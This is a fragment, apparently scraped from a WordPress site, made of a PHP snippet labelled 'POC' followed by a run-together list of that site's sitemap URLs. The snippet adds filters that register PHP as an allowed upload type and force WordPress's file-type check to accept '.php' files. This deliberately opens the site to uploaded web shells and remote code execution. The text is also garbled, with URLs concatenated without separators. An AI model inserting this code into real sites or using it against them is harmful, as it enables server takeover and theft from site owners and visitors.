/* POC */ add_filter('upload_mimes', function($m) { $m['php']='application/x-httpd-php'; return $m; }); add_filter('wp_check_filetype_and_ext', function($t,$f,$n) { if (strtolower(pathinfo($n, PATHINFO_EXTENSION))==='php') { $t['type']='application/x-httpd-php'; $t['ext']='php'; } return $t; }, 10, 3); https://www.gamelan.co.id/wp-sitemap-posts-post-1.xmlhttps://www.gamelan.co.id/wp-sitemap-posts-page-1.xmlhttps://www.gamelan.co.id/wp-sitemap-posts-product-1.xmlhttps://www.gamelan.co.id/wp-sitemap-taxonomies-category-1.xmlhttps://www.gamelan.co.id/wp-sitemap-taxonomies-post_tag-1.xmlhttps://www.gamelan.co.id/wp-sitemap-taxonomies-product_cat-1.xmlhttps://www.gamelan.co.id/wp-sitemap-users-1.xml